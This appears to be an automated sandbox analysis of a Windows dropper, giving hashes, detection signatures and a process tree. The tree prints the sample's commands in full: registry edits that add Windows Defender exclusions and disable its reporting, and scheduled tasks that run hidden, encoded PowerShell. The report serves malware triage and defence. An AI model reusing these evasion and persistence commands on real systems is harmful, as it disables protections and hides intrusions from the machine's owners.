Analysis
-
max time kernel
91s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2022 19:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
cd9f13014d059c401766c254a54504e2
-
SHA1
8ec01ea82312a89f395927b2567e15b03968bb00
-
SHA256
16680cafa63ae8afbbfd5c5e72513afb28c5a4c5f3b41b58552b227c1eb64aab
-
SHA512
6f97dacb11f9e6ec6440950dd3c522c41f3bacac8eaa70bca53102033fa7865171714229082848adaea4755a36374522fe10ba570abd84a9b4ad2eaa8d4e45df
-
SSDEEP
196608:91OYU0KG0VokvOXHFUQ+gX3hpTC/d0Kq0vVsMemBCvmk1o:3OYrKGlZXlUxgX3hpTC/d0gOhmX
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.exeflow pid process 57 2168 rundll32.exe 58 2168 rundll32.exe 60 2168 rundll32.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exedKBzwOc.exeftDUdwI.exepid process 4340 Install.exe 876 Install.exe 4408 dKBzwOc.exe 4948 ftDUdwI.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exeftDUdwI.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation ftDUdwI.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2168 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes:
ftDUdwI.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json ftDUdwI.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json ftDUdwI.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ftDUdwI.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
ftDUdwI.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ftDUdwI.exe -
Drops file in System32 directory 31 IoCs
Processes:
ftDUdwI.exedKBzwOc.exepowershell.exepowershell.exeInstall.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ftDUdwI.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini dKBzwOc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 ftDUdwI.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 ftDUdwI.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ftDUdwI.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol dKBzwOc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 ftDUdwI.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ftDUdwI.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 ftDUdwI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ftDUdwI.exe -
Drops file in Program Files directory 14 IoCs
Processes:
ftDUdwI.exedescription ioc process File created C:\Program Files (x86)\ATZmuaBwNwmU2\XrvZFHv.xml ftDUdwI.exe File created C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\mDIcMgH.dll ftDUdwI.exe File created C:\Program Files (x86)\aJAQLsoDkiWqC\RIKppdt.dll ftDUdwI.exe File created C:\Program Files (x86)\aJAQLsoDkiWqC\OGLGWjY.xml ftDUdwI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ftDUdwI.exe File created C:\Program Files (x86)\ATZmuaBwNwmU2\ButHhHLMbAAVM.dll ftDUdwI.exe File created C:\Program Files (x86)\SHsJRQZsU\ynPViuV.xml ftDUdwI.exe File created C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\tDqdzXs.xml ftDUdwI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ftDUdwI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ftDUdwI.exe File created C:\Program Files (x86)\SHsJRQZsU\uHHMAV.dll ftDUdwI.exe File created C:\Program Files (x86)\QYiUKrukFVUn\MYPCLbE.dll ftDUdwI.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ftDUdwI.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ftDUdwI.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bNHXguvSZYiOwSiXLC.job schtasks.exe File created C:\Windows\Tasks\VgOpnHVQDAdMZqNFB.job schtasks.exe File created C:\Windows\Tasks\DNDvMcbpefrYjKZ.job schtasks.exe File created C:\Windows\Tasks\mDNVJgqIdbaAfzWWp.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4644 schtasks.exe 4840 schtasks.exe 1412 schtasks.exe 1508 schtasks.exe 3416 schtasks.exe 3652 schtasks.exe 332 schtasks.exe 732 schtasks.exe 3368 schtasks.exe 4924 schtasks.exe 3112 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeftDUdwI.exepowershell.exerundll32.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000} ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" ftDUdwI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2fb4ccdc-0000-0000-0000-d01200000000}\MaxCapacity = "15140" ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ftDUdwI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ftDUdwI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEftDUdwI.exepid process 4548 powershell.EXE 4548 powershell.EXE 3856 powershell.exe 3856 powershell.exe 1076 powershell.exe 1076 powershell.exe 3904 powershell.EXE 3904 powershell.EXE 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe 4948 ftDUdwI.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 4548 powershell.EXE Token: SeDebugPrivilege 3856 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeDebugPrivilege 3904 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEdKBzwOc.exepowershell.execmd.exedescription pid process target process PID 3228 wrote to memory of 4340 3228 file.exe Install.exe PID 3228 wrote to memory of 4340 3228 file.exe Install.exe PID 3228 wrote to memory of 4340 3228 file.exe Install.exe PID 4340 wrote to memory of 876 4340 Install.exe Install.exe PID 4340 wrote to memory of 876 4340 Install.exe Install.exe PID 4340 wrote to memory of 876 4340 Install.exe Install.exe PID 876 wrote to memory of 528 876 Install.exe forfiles.exe PID 876 wrote to memory of 528 876 Install.exe forfiles.exe PID 876 wrote to memory of 528 876 Install.exe forfiles.exe PID 876 wrote to memory of 2024 876 Install.exe forfiles.exe PID 876 wrote to memory of 2024 876 Install.exe forfiles.exe PID 876 wrote to memory of 2024 876 Install.exe forfiles.exe PID 528 wrote to memory of 4812 528 forfiles.exe cmd.exe PID 528 wrote to memory of 4812 528 forfiles.exe cmd.exe PID 528 wrote to memory of 4812 528 forfiles.exe cmd.exe PID 2024 wrote to memory of 4756 2024 forfiles.exe cmd.exe PID 2024 wrote to memory of 4756 2024 forfiles.exe cmd.exe PID 2024 wrote to memory of 4756 2024 forfiles.exe cmd.exe PID 4756 wrote to memory of 2640 4756 cmd.exe reg.exe PID 4756 wrote to memory of 2640 4756 cmd.exe reg.exe PID 4756 wrote to memory of 2640 4756 cmd.exe reg.exe PID 4812 wrote to memory of 4720 4812 cmd.exe reg.exe PID 4812 wrote to memory of 4720 4812 cmd.exe reg.exe PID 4812 wrote to memory of 4720 4812 cmd.exe reg.exe PID 4812 wrote to memory of 3268 4812 cmd.exe reg.exe PID 4812 wrote to memory of 3268 4812 cmd.exe reg.exe PID 4812 wrote to memory of 3268 4812 cmd.exe reg.exe PID 4756 wrote to memory of 1644 4756 cmd.exe reg.exe PID 4756 wrote to memory of 1644 4756 cmd.exe reg.exe PID 4756 wrote to memory of 1644 4756 cmd.exe reg.exe PID 876 wrote to memory of 332 876 Install.exe schtasks.exe PID 876 wrote to memory of 332 876 Install.exe schtasks.exe PID 876 wrote to memory of 332 876 Install.exe schtasks.exe PID 876 wrote to memory of 4924 876 Install.exe schtasks.exe PID 876 wrote to memory of 4924 876 Install.exe schtasks.exe PID 876 wrote to memory of 4924 876 Install.exe schtasks.exe PID 4548 wrote to memory of 3596 4548 powershell.EXE gpupdate.exe PID 4548 wrote to memory of 3596 4548 powershell.EXE gpupdate.exe PID 876 wrote to memory of 1172 876 Install.exe schtasks.exe PID 876 wrote to memory of 1172 876 Install.exe schtasks.exe PID 876 wrote to memory of 1172 876 Install.exe schtasks.exe PID 876 wrote to memory of 3112 876 Install.exe schtasks.exe PID 876 wrote to memory of 3112 876 Install.exe schtasks.exe PID 876 wrote to memory of 3112 876 Install.exe schtasks.exe PID 4408 wrote to memory of 3856 4408 dKBzwOc.exe powershell.exe PID 4408 wrote to memory of 3856 4408 dKBzwOc.exe powershell.exe PID 4408 wrote to memory of 3856 4408 dKBzwOc.exe powershell.exe PID 3856 wrote to memory of 3316 3856 powershell.exe cmd.exe PID 3856 wrote to memory of 3316 3856 powershell.exe cmd.exe PID 3856 wrote to memory of 3316 3856 powershell.exe cmd.exe PID 3316 wrote to memory of 912 3316 cmd.exe reg.exe PID 3316 wrote to memory of 912 3316 cmd.exe reg.exe PID 3316 wrote to memory of 912 3316 cmd.exe reg.exe PID 3856 wrote to memory of 2488 3856 powershell.exe reg.exe PID 3856 wrote to memory of 2488 3856 powershell.exe reg.exe PID 3856 wrote to memory of 2488 3856 powershell.exe reg.exe PID 3856 wrote to memory of 3736 3856 powershell.exe reg.exe PID 3856 wrote to memory of 3736 3856 powershell.exe reg.exe PID 3856 wrote to memory of 3736 3856 powershell.exe reg.exe PID 3856 wrote to memory of 4524 3856 powershell.exe reg.exe PID 3856 wrote to memory of 4524 3856 powershell.exe reg.exe PID 3856 wrote to memory of 4524 3856 powershell.exe reg.exe PID 3856 wrote to memory of 3964 3856 powershell.exe reg.exe PID 3856 wrote to memory of 3964 3856 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS60F1.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS64BA.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxadaqviu" /SC once /ST 06:22:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxadaqviu"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxadaqviu"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNHXguvSZYiOwSiXLC" /SC once /ST 21:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\dKBzwOc.exe\" 3x /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
